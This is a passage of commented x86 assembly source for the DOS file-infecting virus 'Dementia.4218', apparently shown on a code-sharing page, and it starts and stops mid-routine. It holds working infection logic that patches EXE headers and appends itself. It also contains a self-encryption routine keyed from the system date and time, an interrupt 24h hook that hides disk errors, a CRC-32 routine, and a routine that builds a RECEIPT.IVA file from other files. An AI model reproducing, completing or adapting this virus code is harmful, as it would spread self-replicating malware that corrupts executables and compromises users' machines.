📄 dementia.asm
字号:
mov cx,10h ; CX = number of bytes to add to f...
sub cx,ax ; CX = " " " " " " "
mov ax,[bp-04h] ; AX = low-order word of filesize
mov dx,[bp-02h] ; DX = high-order word of filesize
add ax,cx ; Add number of bytes to add to fi...
adc dx,00h ; Convert to 32-bit
mov [bp-04h],ax ; Store low-order word of pointer ...
mov [bp-02h],dx ; Store high-order word of pointer...
call write_file_
push bx ; Save BX at stack
mov ax,[bp-04h] ; AX = low-order word of pointer t...
mov dx,[bp-02h] ; DX = high-order word of pointer ...
mov bx,ds:[08h] ; BX = header size in paragraphs
mov cl,0ch ; Divide by four thousand and nine...
shr bx,cl ; BX = header size in sixty-five t...
sub dx,bx ; Subtract header size in sixty fi...
mov bx,ds:[08h] ; BX = header size in paragraphs
mov cl,04h ; Multiply by paragraphs
shl bx,cl ; BX = header size
sub ax,bx ; Subtract header size from filesize
sbb dx,00h ; Convert to 32-bit
mov [bp-04h],ax ; Store low-order word of pointer ...
mov [bp-02h],dx ; Store high-order word of pointer...
pop bx ; Load BX from stack
mov ax,ds:[14h] ; AX = original instruction pointer
mov cs:[instruct_ptr],ax
mov ax,ds:[16h] ; AX = original code segment
mov cs:[code_seg],ax ; Store original code segment
xor ax,ax ; Zero AX
mov ds:[14h],ax ; Store initial IP
mov cs:[initial_ip],ax ; Store " "
mov ax,[bp-02h] ; AX = high-order word of pointer ...
test ax,1111111111110000b
jz calc_ins_ptr ; Zero? Jump to calc_ins_ptr
jmp inf_exe_exit
calc_ins_ptr:
mov cl,0ch
shl ax,cl ; Multiply by sixty-five thousand ...
mov dx,[bp-04h] ; DX = low-order word of pointer t...
mov cl,04h ; Divide by paragraphs
shr dx,cl ; DX = low-order word of pointer t...
add ax,dx ; AX = initial CS relative to star...
mov ds:[16h],ax ; Store initial CS relative to sta...
mov cs:[initial_cs],ax ; " " " " " "
push ax ; Save AX at stack
mov ax,ds:[0eh] ; AX = initial SS relative to star...
mov cs:[stack_seg],ax ; Store initial SS relative to sta...
mov ax,ds:[10h] ; AX = initial SP
mov cs:[stack_ptr],ax ; Store initial SP
pop ax ; Load AX from stack
add ax,(code_end-code_begin+0fh)/10h
jae store_stack ; Above or equal? Jump to store_stack
jmp inf_exe_exit
nop
store_stack:
mov ds:[0eh],ax ; Store initial SS relative to sta...
mov ax,100h ; AX = initial SP
mov ds:[10h],ax ; Store initial SP
push bx ; Save BX at stack
mov ax,[bp-04h] ; AX = low-order word of pointer t...
mov dx,[bp-02h] ; DX = high-order word of pointer ...
mov bx,ds:[08h] ; BX = header size in paragraphs
mov cl,0ch ; Divide by four thousand and nine...
shr bx,cl ; BX = header size in sixty-five t...
add dx,bx ; Add header size in sixty-five th...
mov bx,ds:[08h] ; BX = header size in paragraphs
mov cl,04h ; Multiply by paragraphs
shl bx,cl ; BX = header size
add ax,bx ; Add header size to filesize
adc dx,00h ; Convert to 32-bit
mov [bp-04h],ax ; Store low-order word of pointer ...
mov [bp-02h],dx ; Store high-order word of pointer...
pop bx ; Load BX from stack
mov ax,[bp-04h] ; AX = low-order word of pointer t...
mov dx,[bp-02h] ; DX = high-order word of pointer ...
add ax,(code_end-code_begin)
adc dx,00h ; Convet to 32-bit
mov cl,07h
shl dx,cl ; Multiply by one hundred and twen...
push ax ; Save AX at stack
mov cl,09h ; Divide by pages
shr ax,cl ; AX = low-order word of pointer t...
add dx,ax ; DX = number of bytes on last 512...
pop ax ; Load AX from stack
and ax,0000000000011111b
jz store_pages ; Zero? Jump to store_pages
inc dx ; Increase number of bytes on last...
jmp store_pages_
nop
store_pages:
mov ax,200h ; AX = total number of 512-bytes p...
store_pages_:
mov ds:[02h],ax ; Store total number of 512-bytes ...
mov ds:[04h],dx ; Store number of bytes on last 51...
mov ax,ds:[0ch] ; AX = maximum paragraphs to alloc...
cmp ax,10h ; Maximum paragraphs to allocate ...?
jae store_maximu ; Above or equal? Jump to store_ma...
mov ax,10h ; AX = new maximum paragraphs to a...
store_maximu:
mov ds:[0ch],ax ; Store maximum paragraphs to allo...
call set_pos_sof
mov cx,20h ; Write thirty-two bytes
call write_file
call set_pos_eof
call encrypt_copy
mov cx,(code_end-code_begin)
call write_file
inf_exe_exit:
mov sp,bp ; SP = stack pointer
pop bp ; Load BP from stack
ret ; Return!
endp
encrypt_copy proc near ; Move virus to data buffer and en...
push bx ; Save BX at stack
mov ah,2ch ; Get system time
int 21h
mov bx,cx ; BX = hour and minute
xor bx,dx ; BX = 16-bit random number
mov ah,2ah ; Get system date
int 21h
xor bx,cx ; BX = 16-bit random number
xor bx,dx ; BX = decryption key
mov dx,bx ; DX = " "
mov cs:[decrypt_key],dx ; Store decryption key
pop bx ; Load BX from stack
cld ; Clear direction flag
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h
mov es,ax ; ES = segment of data buffer
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
xor si,si ; Zero SI
xor di,di ; Zero DI
mov cx,(code_end-code_begin)
rep movsb ; Move virus to data buffer
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
lea si,crypt_begin-02h ; SI = offset of crypt_end
mov di,si ; DI = " " "
mov cx,(crypt_begin-crypt_end-02h)/02h
std ; Set direction flag
encrypt_loop:
lodsw ; AX = word of plain code
xor ax,dx ; Encrypt word
stosw ; Store encrypted word
loop encrypt_loop
cld ; Clear direction flag
ret ; Return!
endp
int24_store proc near ; Get and set interrupt vector 24h
push bx dx ds es ; Save registers at stack
mov ax,3524h ; Get interrupt vector 24h
int 21h
mov word ptr cs:[int24_addr],bx
mov word ptr cs:[int24_addr+02h],es
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
lea dx,int24_virus+110h ; DX = offset of int24_virus + 110h
mov ax,2524h ; Set interrupt vector 24h
int 21h
pop es ds dx bx ; Load registers from stack
ret ; Return!
endp
int24_load proc near ; Set interrupt vector 24h
push dx ds ; Load registers from stack
mov dx,word ptr cs:[int24_addr]
mov ds,word ptr cs:[int24_addr+02h]
mov ax,2524h ; Set interrupt vector 24h
int 21h
pop ds dx ; Load registers from stack
ret ; Return!
endp
int24_virus proc near ; Interrupt 24h of Dementia.4218
mov al,03h ; Fail system call in progress
iret ; Interrupt return!
endp
calc_crc32 proc near ; Calculate CRC-32 checksum
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h
mov ds,ax ; DS = segment of data buffer
add ax,40h ; AX = segment of CRC-32 table
mov es,ax ; ES = " " " "
xor di,di ; Zero DI
xor cx,cx ; Zero CX
gen_crc_tab:
xor dx,dx ; Zero DX
xor ax,ax ; Zero AX
mov al,cl ; AL = counter
push cx ; Save CX at stack
mov cx,08h ; Calculate each CRC-32 table entr...
gen_crc_loop:
clc ; Clear carry flag
rcr dx,01h ; Rotate DX through carry one bit ...
rcr ax,01h ; Rotate AX through carry one bit ...
jnc carry_loop ; No carry? Jump to carry_loop
xor dx,0edb8h ; DX = high-order word of CRC-32 t...
xor ax,8320h ; AX = low-order word of CRC-32 ta...
carry_loop:
loop gen_crc_loop
mov es:[di],ax ; Store low-order word of CRC-32 t...
mov es:[di+02h],dx ; Store high-order word of CRC-32 ...
add di,04h ; DI = offset of next CRC-32 table...
pop cx ; Load CX from stack
inc cx ; Increase count register
cmp cx,100h ; Generated enough CRC-32 table en...
jne gen_crc_tab ; Not equal? Jump to gen_crc_tab
call set_pos_sof
mov dx,0ffffh ; DX = high-order word of CRC-32 c...
mov ax,0ffffh ; AX = low-order word of CRC-32 ch...
read_block:
push ax dx ; Save registers at stack
mov cx,400h ; Read one thousand and twenty-fou...
call read_file
cmp ax,00h ; Read all of the file?
je calc_crc_xit ; Equal? Jump to calc_crc_xit
mov cx,ax ; CX = number of bytes actually read
pop dx ax ; Load registers from stack
xor si,si ; Zero SI
cal_crc_loop:
push bx cx ; Save registers at stack
xor bh,bh ; Zero BH
mov bl,[si] ; BL = byte of file
inc si ; Increase index register
xor bl,al ; Exclusive OR (XOR) byte of file ...
mov cl,02h
shl bx,cl ; Multiply by four
mov di,bx ; DI = offset of next CRC-32 table...
mov al,ah ; AL = low-order byte of low-order...
mov ah,dl ; AH = high-order byte of low-orde...
mov dl,dh ; DL = low-order byte of high-orde...
xor dh,dh ; Zero DH
mov bx,es:[di] ; BX = low-order word of CRC-32 ta...
xor ax,bx ; AX = low-order word of CRC-32 ch...
mov bx,es:[di+02h] ; BX = high-order word of CRC-32 t...
xor dx,bx ; DX = high-order word of CRC-32 c...
pop cx bx ; Load registers from stack
loop cal_crc_loop
jmp read_block
calc_crc_xit:
pop dx ax ; Load registers from stack
xor dx,0ffffh ; DX = high-order word of CRC-32 c...
xor ax,0ffffh ; AX = low-order word of CRC-32 ch...
ret ; Return!
endp
create_recei proc near ; Create RECEIPT.IVA file
push bp ; Save BP at stack
mov bp,sp ; BP = stack pointer
sub sp,12h ; Correct stack pointer
mov [bp-08h],ax ; Store number of file specifications
mov [bp-10h],bx ; Store file handle of RECEIPT.IVA
mov [bp-02h],dx ; Store store or don't store backs...
mov [bp-06h],ds ; Store segment of file specificat...
mov ah,3bh ; Set current directory
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
xor dx,dx ; Zero DX
int 21h
mov ax,[bp-08h] ; AX = number of file specifications
xor cx,cx ; Zero CX
mov cl,al ; CL = number of file specifications
xor dx,dx ; Zero DX
find_first_:
mov ds,[bp-06h] ; DS = segment of file specification
push cx ; Save CX at stack
mov cx,0000000000000111b
call find_first
push dx ; Save DX at stack
jnc find_next_ ; No error? Jump to find_next_
jmp fnd_nxt_loop
nop
find_next_:
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h+48h
mov ds,ax ; DS = segment of disk transfer area
mov dx,1eh ; DX = offset of filename
call open_file
mov [bp-12h],ax ; Store file handle of file within...
mov bx,[bp-10h] ; BX = file handle of RECEIPT.IVA
call set_pos_eof
push ds ; Save DS at stack
mov ax,cs ; AX = code segment
add ax,(code_end-code_begin+0fh)/10h+44h
mov ds,ax ; DS = segment of end of pathname
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -